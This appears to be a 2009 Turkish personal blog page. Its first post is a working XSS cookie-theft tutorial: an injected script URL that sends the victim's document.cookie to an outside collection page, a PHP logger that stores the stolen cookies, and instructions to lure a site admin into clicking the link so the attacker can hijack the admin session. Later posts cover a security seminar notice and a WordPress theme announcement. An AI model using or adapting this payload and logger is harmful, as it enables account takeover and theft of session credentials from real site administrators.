XSS açıgı olan sitelerin cookie bilgisini almak

site.com/ajax.php?ibne=<script>window.navigate(”http://www.deneme.com/asir/xssmail.php?veri=”+document.cookie)</script>

<?

#coded by hexerboy

#11-5-2009

@$x=$_SERVER['SCRIPT_NAME'];
@$get=$_GET['veri'];
echo “<center>
<form action=$x?giraq=log method=post>
<input type=password name=sifre><br>
<input type=submit value=gir></center>
“;
$fp=fopen(”cookienler.txt”,”w”);
fwrite($fp,”$get”);
if($get==”cookie”){
@$dosya=file(’cookienler.txt’);
foreach($dosya as $hex)
echo “GELEN COOKİEsler:<br><b>$hex</b>”;
}
@$get2=$_GET["giraq"];
if($get2==”log”){
@$post=$_POST["sifre"];
if($post==”123456″){ // şifreniz.
echo “<a href=$x?veri=cookie>Cookie bilgilerin</a>”;
exit;}else{echo “giriş başarısız.”;}
}
?>

ilk önce ftpnize yukarıdaki kodları xssmail.php die  kaydedip atın.daha snra;xss açıgı olan sitelerde adminin cookie bilgisini almak için yukardaki linke tıklattırın (bi şekilde kendiniz düşünün onuda )  ve sitenize girip cookie bilgisini alıp,opera veya cookieeditörden değiştirn ve admin olun:D

İnegöl Belediyesi ‘Bilişim Dünyasında Güvenlik’ Semineri

Bilişim Güvenliği ve Bilişim Suçlarına Karşı Mücadele Derneği;
Bilişim Dünyasında Güvenlik adlı seminer düzenlenecektir..

Yer: Sani Konukoğlu Konferans Salonu (Sani Konukoğlu Camii yanı)
Tarih : 27 Mayıs 2009

Saat : 21.00

Konuşmacılar : Mustafa Altıntepe

Afiş için tıklayın

LineWP Teması // Design by TekNefes

Bugünlerde canım bayağı bi sıkkındı kendimi bişeyler ile avutayım diyordum, aklıma artisteer geldi ve tema yapmaya karar verdim..
Kişisel siteler için yaptığım temayı umarım beğenirsiniz =)
Yakında CW’nin renklerine has tema yapacağım bu şimdilik bi bakıma beta versiyondur ama 1.0 yazdım çaktırmayın

ScreenShot:

tema indirme bağlantısı 1
tema indirme bağlantısı 2

Bu site!

Bu blog Ömer Faruk AKSU’nun kişisel ve birazda genel güncesidir..
Hayırlı Olsun..